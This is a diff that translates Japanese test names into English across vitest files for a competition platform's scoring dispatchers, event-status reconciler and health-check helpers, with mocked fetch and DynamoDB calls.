+  it("should skip problemIds without scoring config (scoring disabled)", async () => {
     process.env.BATTLE_PROBLEMS_SCORING = JSON.stringify({});
     process.env.PROBLEM_ENDPOINTS = JSON.stringify({});
     process.env.BATTLE_PROBLEMS_PHASES = JSON.stringify({});
@@ -179,7 +179,7 @@ describe("generic scoring dispatcher: hello-world-battle (= legacy uptime) 挙�
     expect(fetchMock).not.toHaveBeenCalled();
   });
 
-  it("kind=flag は polling では skip し fetch しないべき", async () => {
+  it("should skip and not fetch for kind=flag during polling", async () => {
     process.env.BATTLE_PROBLEMS_SCORING = JSON.stringify({
       "hello-world": { kind: "flag", flagOutputKey: "X", points: 100 },
     });
@@ -210,7 +210,7 @@ describe("generic scoring dispatcher: hello-world-battle (= legacy uptime) 挙�
     expect(fetchMock).not.toHaveBeenCalled();
   });
 
-  it("scoringLocked=true な event は採点を skip すべき (#558 fail-closed)", async () => {
+  it("should skip scoring for events with scoringLocked=true (#558 fail-closed)", async () => {
     process.env.BATTLE_PROBLEMS_SCORING = JSON.stringify({
       "hello-world-battle": {
         kind: "uptime",

--- a/infrastructure/test/problem-deploy/generic-scoring-flag.test.ts
+++ b/infrastructure/test/problem-deploy/generic-scoring-flag.test.ts
@@ -17,7 +17,7 @@ import type { FlagScoringMetadata } from "../../lib/utils/scoring-metadata";
  */
 
 describe("flag kind in polling dispatcher", () => {
-  it("polling 経由では何もしないべき (= scoreDelta=0、 scoreEvents 空)", () => {
+  it("should do nothing via polling (scoreDelta=0, empty scoreEvents)", () => {
     const input: KindHandlerInput<FlagScoringMetadata> = {
       deployment: { PK: "DEPLOYMENT#JOB1", jobId: "JOB1", problemId: "hello-world" },
       scoring: { kind: "flag", flagOutputKey: "ParameterValue", points: 100 },
@@ -35,20 +35,20 @@ describe("flag kind in polling dispatcher", () => {
 });
 
 describe("flagMatches (shared helper、 submit-flag と共有)", () => {
-  it("一致するなら true を返すべき", () => {
+  it("should return true on match", () => {
     expect(flagMatches("hello", "hello")).toBe(true);
   });
 
-  it("両端 trim 後の一致を判定すべき", () => {
+  it("should compare equality after trimming both ends", () => {
     expect(flagMatches("  hello  ", "hello")).toBe(true);
     expect(flagMatches("hello\n", "hello")).toBe(true);
   });
 
-  it("大文字小文字は区別すべき (= case-sensitive)", () => {
+  it("should be case-sensitive", () => {
     expect(flagMatches("Hello", "hello")).toBe(false);
   });
 
-  it("中央のスペースは区別すべき", () => {
+  it("should distinguish spaces in the middle", () => {
     expect(flagMatches("hello world", "hello  world")).toBe(false);
   });
 });

--- a/infrastructure/test/problem-deploy/generic-scoring-phased-polling.test.ts
+++ b/infrastructure/test/problem-deploy/generic-scoring-phased-polling.test.ts
@@ -87,7 +87,7 @@ describe("phased-polling kind", () => {
     vi.unstubAllGlobals();
   });
 
-  it("Phase 0 (30分経過) + ec2 platform で +100 加点すべき", async () => {
+  it("should award +100 for Phase 0 (after 30 minutes) + ec2 platform", async () => {
     // meta → ec2、 score → 200
     fetchMock
       .mockResolvedValueOnce({ status: 200, text: async () => JSON.stringify({ platform: "ec2" }) })
@@ -96,7 +96,7 @@ describe("phased-polling kind", () => {
     expect(result.scoreDelta).toBe(100);
   });
 
-  it("Phase 1 (degraded、 60 分後) + ec2 platform で degradedPoints (+10) を加点すべき", async () => {
+  it("should award degradedPoints (+10) for Phase 1 (degraded, after 60 minutes) + ec2 platform", async () => {
     fetchMock
       .mockResolvedValueOnce({ status: 200, text: async () => JSON.stringify({ platform: "ec2" }) })
       .mockResolvedValueOnce({ status: 200, text: async () => "" });
@@ -106,7 +106,7 @@ describe("phased-polling kind", () => {
     expect(result.scoreDelta).toBe(10);
   });
 
-  it("Phase 2 (legacy、 90 分後) は scorePath を /score?legacy=true に切替えるべき", async () => {
+  it("Phase 2 (legacy, after 90 minutes) should switch scorePath to /score?legacy=true", async () => {
     fetchMock
       .mockResolvedValueOnce({ status: 200, text: async () => JSON.stringify({ platform: "ec2" }) })
       .mockResolvedValueOnce({ status: 200, text: async () => "" });
@@ -118,7 +118,7 @@ describe("phased-polling kind", () => {
     expect(scoreCall).toBe("https://api.example.com/users/score?legacy=true");
   });
 
-  it("platform=lambda なら +1000 加点すべき (+ all-slots-on-lambda bonus +5000、 1 slot で satisfy)", async () => {
+  it("should award +1000 for platform=lambda (+ all-slots-on-lambda bonus +5000 satisfied by 1 slot)", async () => {
     fetchMock
       .mockResolvedValueOnce({
         status: 200,
@@ -130,7 +130,7 @@ describe("phased-polling kind", () => {
     expect(result.scoreDelta).toBe(1000 + 5000);
   });
 
-  it("/score が 500 なら failurePenalty (-100) を加点すべき", async () => {
+  it("should award failurePenalty (-100) when /score returns 500", async () => {
     fetchMock
       .mockResolvedValueOnce({ status: 200, text: async () => JSON.stringify({ platform: "ec2" }) })
       .mockResolvedValueOnce({ status: 500, text: async () => "" });
@@ -139,7 +139,7 @@ describe("phased-polling kind", () => {
     expect(result.lastResult).toBe("fail");
   });
 
-  it("platform 不明 (meta 応答 body 不正) なら failurePenalty 適用すべき", async () => {
+  it("should apply failurePenalty when the platform is unknown (invalid meta response body)", async () => {
     fetchMock
       .mockResolvedValueOnce({ status: 200, text: async () => "" })
       .mockResolvedValueOnce({ status: 200, text: async () => "" });
@@ -147,7 +147,7 @@ describe("phased-polling kind", () => {
     expect(result.scoreDelta).toBe(-100);
   });
 
-  it("bonus all-slots-on-platforms: 全 slot が lambda にあれば +5000 を 1 回だけ加算すべき", async () => {
+  it("bonus all-slots-on-platforms: should add +5000 once if all slots are on lambda", async () => {
     // meta=lambda, score=ok
     fetchMock.mockImplementation(async (url: string) => {
       if (url.endsWith("/meta")) {
@@ -168,7 +168,7 @@ describe("phased-polling kind", () => {
     expect(next.scoreDelta).toBe(1000);
   });
 
-  it("responsePenalty (= responseTimeMs > 1500) は遅い slot に -10 を追加適用すべき", async () => {
+  it("responsePenalty (responseTimeMs > 1500) should additionally apply -10 to slow slots", async () => {
     // status=200 だが responseTimeMs を 2000 にしたい → fetch mock で setTimeout で遅延を作る
     fetchMock.mockImplementation(async (url: string) => {
       if (url.endsWith("/meta")) {

--- a/infrastructure/test/problem-deploy/generic-scoring-reconciler.test.ts
+++ b/infrastructure/test/problem-deploy/generic-scoring-reconciler.test.ts
@@ -17,79 +17,79 @@ import {
  */
 
 describe("resolveEventStatusTransition (#557 #539 pure logic)", () => {
-  it("DEPLOYING + 全 COMPLETE なら READY に遷移すべき", () => {
+  it("should transition to READY when DEPLOYING + all COMPLETE", () => {
     expect(resolveEventStatusTransition("DEPLOYING", ["COMPLETE", "COMPLETE"])).toBe("READY");
   });
 
-  it("DEPLOYING + COMPLETE/FAILED 混在なら READY に遷移すべき (FAILED も terminal 扱い)", () => {
+  it("should transition to READY on DEPLOYING + mixed COMPLETE/FAILED (FAILED treated as terminal)", () => {
     expect(resolveEventStatusTransition("DEPLOYING", ["COMPLETE", "FAILED", "COMPLETE"])).toBe(
       "READY",
     );
   });
 
-  it("DEPLOYING + PENDING が 1 件でも残るなら undefined を返すべき (= まだ動かさない)", () => {
+  it("should return undefined when even one DEPLOYING + PENDING remains (don't move yet)", () => {
     expect(resolveEventStatusTransition("DEPLOYING", ["COMPLETE", "PENDING"])).toBeUndefined();
   });
 
-  it("DEPLOYING + IN_PROGRESS が残るなら undefined を返すべき", () => {
+  it("should return undefined when DEPLOYING + IN_PROGRESS remain", () => {
     expect(resolveEventStatusTransition("DEPLOYING", ["COMPLETE", "IN_PROGRESS"])).toBeUndefined();
   });
 
-  it("TEARDOWN + 全 DELETED なら ARCHIVED に遷移すべき", () => {
+  it("should transition to ARCHIVED on TEARDOWN + all DELETED", () => {
     expect(resolveEventStatusTransition("TEARDOWN", ["DELETED", "DELETED"])).toBe("ARCHIVED");
   });
 
-  it("TEARDOWN + DELETED/FAILED 混在なら ARCHIVED に遷移すべき (= teardown 失敗行も引きずらない)", () => {
+  it("should transition to ARCHIVED on TEARDOWN + mixed DELETED/FAILED (don't drag teardown failures)", () => {
     expect(resolveEventStatusTransition("TEARDOWN", ["DELETED", "FAILED"])).toBe("ARCHIVED");
   });
 
-  it("TEARDOWN + DELETING が残るなら undefined を返すべき (= まだ削除中)", () => {
+  it("should return undefined when TEARDOWN + DELETING remain (still deleting)", () => {
     expect(resolveEventStatusTransition("TEARDOWN", ["DELETED", "DELETING"])).toBeUndefined();
   });
 
-  it("子 deployment 0 件なら undefined を返すべき (= bulk-deploy/delete 前の race state、 触らない)", () => {
+  it("should return undefined when child deployments are 0 (pre-bulk-deploy/delete race state, don't touch)", () => {
     expect(resolveEventStatusTransition("DEPLOYING", [])).toBeUndefined();
     expect(resolveEventStatusTransition("TEARDOWN", [])).toBeUndefined();
   });
 
-  it("対象外 status (DRAFT / ENDED / ARCHIVED) は defense-in-depth で undefined を返すべき", () => {
+  it("should return undefined for out-of-scope status (DRAFT / ENDED / ARCHIVED) (defense in depth)", () => {
     expect(resolveEventStatusTransition("DRAFT", ["COMPLETE"])).toBeUndefined();
     expect(resolveEventStatusTransition("ENDED", ["DELETED"])).toBeUndefined();
     expect(resolveEventStatusTransition("ARCHIVED", ["DELETED"])).toBeUndefined();
   });
 
   // Issue #1038 P0 #3: READY + endsAt 経過の自動 ENDED 遷移
-  it("READY + endsAt が現在時刻を過ぎていたら ENDED に遷移すべき", () => {
+  it("should transition to ENDED when READY + endsAt is past now", () => {
     const endsAt = "2026-05-15T00:00:00.000Z";
     const nowMs = Date.parse("2026-05-15T00:00:01.000Z");
     expect(resolveEventStatusTransition("READY", [], { endsAt, nowMs })).toBe("ENDED");
   });
 
-  it("READY + endsAt がちょうど現在時刻なら ENDED に遷移すべき (= 境界包含)", () => {
+  it("should transition to ENDED when READY + endsAt equals now (boundary inclusive)", () => {
     const endsAt = "2026-05-15T00:00:00.000Z";
     const nowMs = Date.parse(endsAt);
     expect(resolveEventStatusTransition("READY", [], { endsAt, nowMs })).toBe("ENDED");
   });
 
-  it("READY + endsAt がまだ未来なら undefined を返すべき (= 触らない)", () => {
+  it("should return undefined when READY + endsAt is still in the future (don't touch)", () => {
     const endsAt = "2026-05-15T01:00:00.000Z";
     const nowMs = Date.parse("2026-05-15T00:00:00.000Z");
     expect(resolveEventStatusTransition("READY", [], { endsAt, nowMs })).toBeUndefined();
   });
 
-  it("READY + endsAt 不在なら undefined を返すべき (= 無期限 event は触らない)", () => {
+  it("should return undefined when READY + endsAt is absent (don't touch open-ended events)", () => {
     const nowMs = Date.parse("2026-05-15T00:00:00.000Z");
     expect(resolveEventStatusTransition("READY", [], { nowMs })).toBeUndefined();
   });
 
-  it("READY + 不正な endsAt (parse 不能) なら undefined を返すべき", () => {
+  it("should return undefined for READY + invalid endsAt (unparseable)", () => {
     const nowMs = Date.parse("2026-05-15T00:00:00.000Z");
     expect(
       resolveEventStatusTransition("READY", [], { endsAt: "not-a-date", nowMs }),
     ).toBeUndefined();
   });
 
-  it("READY + context 未指定なら undefined を返すべき (= 旧 caller の互換)", () => {
+  it("should return undefined for READY without context (legacy caller compat)", () => {
     expect(resolveEventStatusTransition("READY", [])).toBeUndefined();
     expect(resolveEventStatusTransition("READY", ["COMPLETE"])).toBeUndefined();
   });
@@ -117,7 +117,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
   });
   afterEach(() => ddbSend.mockReset());
 
-  it("DEPLOYING で子 deployments 全 COMPLETE → Update で READY に遷移すべき", async () => {
+  it("should transition to READY via Update when DEPLOYING and all child deployments are COMPLETE", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [{ PK: "EVENT#EV1", tenantId: "tenant-acme", eventId: "EV1", status: "DEPLOYING" }],
       LastEvaluatedKey: undefined,
@@ -144,7 +144,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(updateCmd.input.ConditionExpression).toContain("#status = :current");
   });
 
-  it("TEARDOWN で子 deployments 全 DELETED → Update で ARCHIVED に遷移すべき", async () => {
+  it("should transition to ARCHIVED via Update when TEARDOWN and all child deployments are DELETED", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [{ PK: "EVENT#EV2", tenantId: "tenant-acme", eventId: "EV2", status: "TEARDOWN" }],
     });
@@ -162,7 +162,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(updateCmd.input.ExpressionAttributeValues[":current"]).toBe("TEARDOWN");
   });
 
-  it("DEPLOYING で PENDING が残る → Update を発行しないべき (= まだ READY ではない)", async () => {
+  it("should not issue Update when DEPLOYING with PENDING remaining (not READY yet)", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [{ PK: "EVENT#EV3", tenantId: "tenant-acme", eventId: "EV3", status: "DEPLOYING" }],
     });
@@ -174,7 +174,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(ddbSend).toHaveBeenCalledTimes(2);
   });
 
-  it("複数 Event を **並列** に処理すべき (= 1 件遅延が他を block しない)", async () => {
+  it("should process multiple Events **in parallel** (one slow event must not block others)", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [
         { PK: "EVENT#A", tenantId: "tenant-acme", eventId: "A", status: "DEPLOYING" },
@@ -194,7 +194,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(ddbSend).toHaveBeenCalledTimes(5);
   });
 
-  it("Event 更新の CCF (= operator race) は throw せず silent skip すべき", async () => {
+  it("should silently skip without throwing on Event update CCF (operator race)", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [{ PK: "EVENT#EV4", tenantId: "tenant-acme", eventId: "EV4", status: "DEPLOYING" }],
     });
@@ -207,7 +207,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     await expect(reconcileEventStatuses(ctx, NOW_ISO)).resolves.toBeUndefined();
   });
 
-  it("Scan が pagination するべき (= LastEvaluatedKey 有り → 次 Scan)", async () => {
+  it("Scan should paginate (with LastEvaluatedKey → next Scan)", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [{ PK: "EVENT#P1", tenantId: "t", eventId: "P1", status: "DEPLOYING" }],
       LastEvaluatedKey: { PK: "cursor" },
@@ -224,7 +224,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(scan2.input.ExclusiveStartKey).toEqual({ PK: "cursor" });
   });
 
-  it("Deployment Query が pagination するべき (= Filter 後の空 page を越えて READY 判定する)", async () => {
+  it("Deployment Query should paginate (judging READY across empty pages after filtering)", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [
         {
@@ -264,7 +264,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(updateCmd.input.ExpressionAttributeValues[":next"]).toBe("READY");
   });
 
-  it("Deployment Query の後続 page に非 terminal があれば READY にしないべき", async () => {
+  it("should not mark READY if subsequent Deployment Query pages contain non-terminal rows", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [
         {
@@ -296,7 +296,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
   });
 
   // Issue #828: stuck DELETING rescue path の test
-  it("TEARDOWN で `DELETING` が 30 min 以上停滞していたら FAILED に rescue + ARCHIVED に遷移すべき", async () => {
+  it("should rescue stuck `DELETING` rows for 30+ min to FAILED and transition to ARCHIVED during TEARDOWN", async () => {
     const now = "2026-05-15T01:00:00.000Z";
     const stale = "2026-05-15T00:25:00.000Z"; // 35 min 前 (= threshold 30 min を超過)
     ddbSend.mockResolvedValueOnce({
@@ -337,7 +337,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(eventUpdate.input.ExpressionAttributeValues[":next"]).toBe("ARCHIVED");
   });
 
-  it("TEARDOWN でも `DELETING` が threshold 未満 (= まだ削除中) なら rescue も ARCHIVED 遷移も発火させないべき", async () => {
+  it("should not trigger rescue or ARCHIVED transition during TEARDOWN when `DELETING` is below threshold (still deleting)", async () => {
     const now = "2026-05-15T01:00:00.000Z";
     const recent = "2026-05-15T00:50:00.000Z"; // 10 min 前 (= threshold 未満)
     ddbSend.mockResolvedValueOnce({
@@ -358,7 +358,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(ddbSend).toHaveBeenCalledTimes(2);
   });
 
-  it("`isStuckDeletingForTeardown` pure logic は eventStatus / status / threshold を組み合わせて判定すべき", () => {
+  it("`isStuckDeletingForTeardown` pure logic should combine eventStatus / status / threshold", () => {
     const nowMs = Date.parse("2026-05-15T01:00:00.000Z");
     const stale = "2026-05-15T00:00:00.000Z"; // 60 min 前
     const recent = "2026-05-15T00:55:00.000Z"; // 5 min 前
@@ -386,7 +386,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     ).toBe(false);
   });
 
-  it("`rescueStuckDeletingDeployments` は PK 欠落行を rescue skip すべき (= projection 漏れ safety)", async () => {
+  it("`rescueStuckDeletingDeployments` should skip rescue for rows missing PK (projection-leak safety)", async () => {
     const nowMs = Date.parse("2026-05-15T01:00:00.000Z");
     await rescueStuckDeletingDeployments(
       ctx,
@@ -397,7 +397,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("`rescueStuckDeletingDeployments` の UpdateItem CCF (= 並行 MarkDeleted/MarkFailed) は silent skip すべき", async () => {
+  it("`rescueStuckDeletingDeployments` should silently skip on UpdateItem CCF (= concurrent MarkDeleted/MarkFailed)", async () => {
     const nowMs = Date.parse("2026-05-15T01:00:00.000Z");
     ddbSend.mockImplementationOnce(async () => {
       const err: Error & { name?: string } = new Error("conditional check failed");
@@ -419,7 +419,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     ).resolves.toBe(0);
   });
 
-  it("Event filter は DEPLOYING / READY / TEARDOWN 対象であるべき (= ENDED / ARCHIVED は触らない)", async () => {
+  it("Event filter should target DEPLOYING / READY / TEARDOWN (don't touch ENDED / ARCHIVED)", async () => {
     ddbSend.mockResolvedValueOnce({ Items: [] });
     await reconcileEventStatuses(ctx, NOW_ISO);
     const scanCmd = ddbSend.mock.calls[0]?.[0] as {
@@ -440,7 +440,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
   });
 
   // Issue #1038 P0 #3: READY + endsAt 経過で自動 ENDED 遷移
-  it("READY で endsAt が現在時刻を過ぎていたら Update で ENDED に遷移すべき (= deployment 行は query しない)", async () => {
+  it("should transition to ENDED via Update when READY and endsAt is past now (don't query deployment rows)", async () => {
     const now = "2026-05-15T01:00:00.000Z";
     const pastEnd = "2026-05-15T00:30:00.000Z";
     ddbSend.mockResolvedValueOnce({
@@ -472,7 +472,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(updateCmd.input.ConditionExpression).toContain("#status = :current");
   });
 
-  it("READY で endsAt がまだ未来なら Update を発行しないべき", async () => {
+  it("should not issue Update when READY and endsAt is still in the future", async () => {
     const now = "2026-05-15T00:00:00.000Z";
     const future = "2026-05-15T01:00:00.000Z";
     ddbSend.mockResolvedValueOnce({
@@ -491,7 +491,7 @@ describe("reconcileEventStatuses (#557 #539 DDB integration)", () => {
     expect(ddbSend).toHaveBeenCalledTimes(1);
   });
 
-  it("READY で endsAt 不在 (= 無期限 event) なら Update も Query も発行しないべき", async () => {
+  it("should issue neither Update nor Query when READY and endsAt is absent (open-ended event)", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [
         {

--- a/infrastructure/test/problem-deploy/generic-scoring-shared.test.ts
+++ b/infrastructure/test/problem-deploy/generic-scoring-shared.test.ts
@@ -18,30 +18,30 @@ import {
 describe("isScoringActive (relocated from health-check-handler)", () => {
   const NOW = "2026-05-08T10:00:00.000Z";
 
-  it("eventStartsAt 未設定なら false を返すべき (= deploy 直後の意図しない加点を防ぐ)", () => {
+  it("should return false when eventStartsAt is unset (prevent unintended scoring right after deploy)", () => {
     expect(isScoringActive({}, NOW)).toBe(false);
     expect(isScoringActive({ eventStartsAt: undefined }, NOW)).toBe(false);
   });
 
-  it("eventStartsAt が現在時刻より未来なら false を返すべき (= operator が schedule 済だが時刻未到達)", () => {
+  it("should return false when eventStartsAt is in the future (operator scheduled but time not reached)", () => {
     expect(isScoringActive({ eventStartsAt: "2026-05-08T10:00:00.001Z" }, NOW)).toBe(false);
     expect(isScoringActive({ eventStartsAt: "2026-05-08T11:00:00.000Z" }, NOW)).toBe(false);
   });
 
-  it("eventStartsAt が現在時刻と同じか過去なら true を返すべき (= 競技開始済、採点 active)", () => {
+  it("should return true when eventStartsAt is at or before now (competition started, scoring active)", () => {
     expect(isScoringActive({ eventStartsAt: NOW }, NOW)).toBe(true);
     expect(isScoringActive({ eventStartsAt: "2026-05-08T09:00:00.000Z" }, NOW)).toBe(true);
     expect(isScoringActive({ eventStartsAt: "2025-01-01T00:00:00.000Z" }, NOW)).toBe(true);
   });
 
-  it("eventEndsAt 未設定は終了 gate 無しで true を返すべき (= 旧 deployment / 終了未指示の event の既存挙動)", () => {
+  it("should return true with no end-gate when eventEndsAt is unset (legacy deployment / no-end event existing behavior)", () => {
     expect(isScoringActive({ eventStartsAt: "2026-05-08T09:00:00.000Z" }, NOW)).toBe(true);
     expect(
       isScoringActive({ eventStartsAt: "2026-05-08T09:00:00.000Z", eventEndsAt: undefined }, NOW),
     ).toBe(true);
   });
 
-  it("eventEndsAt が設定済で now < eventEndsAt なら true を返すべき (= まだ競技中)", () => {
+  it("should return true when eventEndsAt is set and now < eventEndsAt (still competing)", () => {
     expect(
       isScoringActive(
         {
@@ -53,7 +53,7 @@ describe("isScoringActive (relocated from health-check-handler)", () => {
     ).toBe(true);
   });
 
-  it("eventEndsAt 設定済で now >= eventEndsAt なら false を返すべき (= operator が終了済、採点停止)", () => {
+  it("should return false when eventEndsAt is set and now >= eventEndsAt (operator ended, scoring stopped)", () => {
     expect(
       isScoringActive({ eventStartsAt: "2026-05-08T09:00:00.000Z", eventEndsAt: NOW }, NOW),
     ).toBe(false);
@@ -68,7 +68,7 @@ describe("isScoringActive (relocated from health-check-handler)", () => {
     ).toBe(false);
   });
 
-  it("eventStartsAt 未到達なら eventEndsAt が未設定でも false を返すべき (= 開始 gate が優先)", () => {
+  it("should return false when eventStartsAt is not yet reached, even if eventEndsAt is unset (start gate takes precedence)", () => {
     expect(
       isScoringActive({ eventStartsAt: "2026-05-08T11:00:00.000Z", eventEndsAt: undefined }, NOW),
     ).toBe(false);
@@ -76,37 +76,37 @@ describe("isScoringActive (relocated from health-check-handler)", () => {
 });
 
 describe("joinUrl (relocated from health-check-handler)", () => {
-  it("path 空ならそのまま base を返すべき", () => {
+  it("should return base as-is when path is empty", () => {
     expect(joinUrl("https://x.example.com", "")).toBe("https://x.example.com");
   });
 
-  it("base 末尾 / と path 先頭 / の二重スラッシュを正規化すべき", () => {
+  it("should normalize the double slash between trailing / on base and leading / on path", () => {
     expect(joinUrl("https://x.example.com/", "/foo")).toBe("https://x.example.com/foo");
   });
 
-  it("base 末尾 / 無し + path 先頭 / 無しは / を補うべき", () => {
+  it("should insert a / between base without trailing / and path without leading /", () => {
     expect(joinUrl("https://x.example.com", "foo")).toBe("https://x.example.com/foo");
   });
 
-  it("path が絶対 URL ならそのまま採用すべき (= override)", () => {
+  it("should use the path as-is when it is an absolute URL (override)", () => {
     expect(joinUrl("https://x.example.com", "https://other.example.com/health")).toBe(
       "https://other.example.com/health",
     );
   });
 
-  it("通常 case (末尾 / 無し base + 先頭 / path) は base/path で結合すべき", () => {
+  it("normal case (base without trailing / + path with leading /) should join as base/path", () => {
     expect(joinUrl("https://x.example.com", "/healthz")).toBe("https://x.example.com/healthz");
   });
 });
 
 describe("parseEndpointsHealth", () => {
-  it("undefined / 空文字 / 壊れた JSON は空 map を返すべき", () => {
+  it("should return an empty map for undefined / empty string / broken JSON", () => {
     expect(parseEndpointsHealth(undefined)).toEqual({});
     expect(parseEndpointsHealth("")).toEqual({});
     expect(parseEndpointsHealth("{not-json")).toEqual({});
   });
 
-  it("正常な健全性 map を decode すべき", () => {
+  it("should decode a valid health map", () => {
     const raw = JSON.stringify({
       FrontendUrl: { ok: true, checkedAt: "2026-05-05T10:00:00.000Z" },
       ApiUrl: {
@@ -129,21 +129,21 @@ describe("parseEndpointsHealth", () => {
 describe("computeSince", () => {
   const NOW = "2026-05-05T10:05:00.000Z";
 
-  it("ok=true なら undefined を返すべき", () => {
+  it("should return undefined when ok=true", () => {
     expect(computeSince(true, undefined, NOW)).toBeUndefined();
     expect(computeSince(true, { ok: false, checkedAt: "x", since: "y" }, NOW)).toBeUndefined();
   });
 
-  it("ok=false 新規 (prev=undefined) なら now を返すべき", () => {
+  it("should return now when ok=false starts fresh (prev=undefined)", () => {
     expect(computeSince(false, undefined, NOW)).toBe(NOW);
   });
 
-  it("ok=false 新規 (prev.ok=true) なら now を返すべき", () => {
+  it("should return now when ok=false starts fresh (prev.ok=true)", () => {
     const prev: EndpointHealth = { ok: true, checkedAt: "2026-05-05T10:04:00.000Z" };
     expect(computeSince(false, prev, NOW)).toBe(NOW);
   });
 
-  it("ok=false 継続中 (prev.ok=false で prev.since あり) なら prev.since を保持すべき", () => {
+  it("should preserve prev.since when ok=false continues (prev.ok=false with prev.since)", () => {
     const prev: EndpointHealth = {
       ok: false,
       checkedAt: "2026-05-05T10:04:00.000Z",
@@ -154,17 +154,17 @@ describe("computeSince", () => {
 });
 
 describe("parseScoringState (ADR-012 Phase 3.B、 dispatcher state persistence)", () => {
-  it("undefined / 空文字 / 壊れた JSON は空 state を返すべき", () => {
+  it("should return empty state for undefined / empty string / broken JSON", () => {
     expect(parseScoringState(undefined)).toEqual({});
     expect(parseScoringState("")).toEqual({});
     expect(parseScoringState("{not-json")).toEqual({});
   });
 
-  it("attackCount を数値で decode すべき", () => {
+  it("should decode attackCount as a number", () => {
     expect(parseScoringState(JSON.stringify({ attackCount: 42 }))).toEqual({ attackCount: 42 });
   });
 
-  it("bonusAwarded を boolean=true entries のみで decode すべき", () => {
+  it("should decode bonusAwarded only from boolean=true entries", () => {
     expect(
       parseScoringState(
         JSON.stringify({ bonusAwarded: { "all-slots": true, other: false, x: "no" } }),
@@ -172,13 +172,13 @@ describe("parseScoringState (ADR-012 Phase 3.B、 dispatcher state persistence)"
     ).toEqual({ bonusAwarded: { "all-slots": true } });
   });
 
-  it("両 field 混在を decode すべき", () => {
+  it("should decode mixed-field cases", () => {
     expect(
       parseScoringState(JSON.stringify({ attackCount: 1, bonusAwarded: { x: true } })),
     ).toEqual({ attackCount: 1, bonusAwarded: { x: true } });
   });
 
-  it("array や primitive は空 state を返すべき", () => {
+  it("should return empty state for arrays or primitives", () => {
     expect(parseScoringState(JSON.stringify([1, 2]))).toEqual({});
     expect(parseScoringState(JSON.stringify(123))).toEqual({});
   });

--- a/infrastructure/test/problem-deploy/generic-scoring-uptime-flat.test.ts
+++ b/infrastructure/test/problem-deploy/generic-scoring-uptime-flat.test.ts
@@ -60,7 +60,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     vi.unstubAllGlobals();
   });
 
-  it("全 endpoint が 200 を返したら pointsPerSuccess を加算し ok event を 1 件 emit すべき", async () => {
+  it("should add pointsPerSuccess and emit 1 ok event when all endpoints return 200", async () => {
     fetchMock.mockResolvedValue({ status: 200, text: async () => "" });
     const result = await runUptimeFlatKind(buildInput());
     expect(result.scoreDelta).toBe(100);
@@ -68,7 +68,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     expect(result.lastResult).toBe("ok");
   });
 
-  it("1 endpoint が fail でも全 ok でない限り scoreDelta=0 になるべき (= 既存 health-check 挙動)", async () => {
+  it("should return scoreDelta=0 if a single endpoint fails (existing health-check behavior)", async () => {
     fetchMock
       .mockResolvedValueOnce({ status: 200, text: async () => "" })
       .mockResolvedValueOnce({ status: 500, text: async () => "" });
@@ -77,7 +77,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     expect(result.lastResult).toBe("fail");
   });
 
-  it("直前 tick が ok で今 tick fail なら attack-detected event を emit すべき (= ADR-005 D2-A)", async () => {
+  it("should emit an attack-detected event when previous tick was ok and current tick fails (ADR-005 D2-A)", async () => {
     fetchMock.mockResolvedValue({ status: 500, text: async () => "" });
     const input = buildInput({
       deployment: {
@@ -92,7 +92,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     ]);
   });
 
-  it("連続 fail tick では attack-detected を再 emit しないべき (= 重複 write 防止 hard guard)", async () => {
+  it("should not re-emit attack-detected on consecutive fail ticks (hard guard against duplicate writes)", async () => {
     fetchMock.mockResolvedValue({ status: 500, text: async () => "" });
     const input = buildInput({
       deployment: { ...buildInput().deployment, lastResult: "fail" },
@@ -102,7 +102,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     expect(result.scoreEvents).toEqual([]);
   });
 
-  it("endpointsHealth JSON に slot/outputKey ごとの ok / checkedAt を書き戻すべき", async () => {
+  it("should write back per-slot/outputKey ok / checkedAt into endpointsHealth JSON", async () => {
     fetchMock.mockResolvedValue({ status: 200, text: async () => "" });
     const result = await runUptimeFlatKind(buildInput());
     const health = JSON.parse(result.endpointsHealthJson ?? "{}");
@@ -110,7 +110,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     expect(health.ApiUrl).toMatchObject({ ok: true, checkedAt: NOW_ISO });
   });
 
-  it("slot 経由で metadata.endpoints の default URL を解決すべき (ADR-012 Phase 3.B 新規)", async () => {
+  it("should resolve metadata.endpoints default URLs via slot (new in ADR-012 Phase 3.B)", async () => {
     fetchMock.mockResolvedValue({ status: 200, text: async () => "" });
     const input = buildInput({
       scoring: {
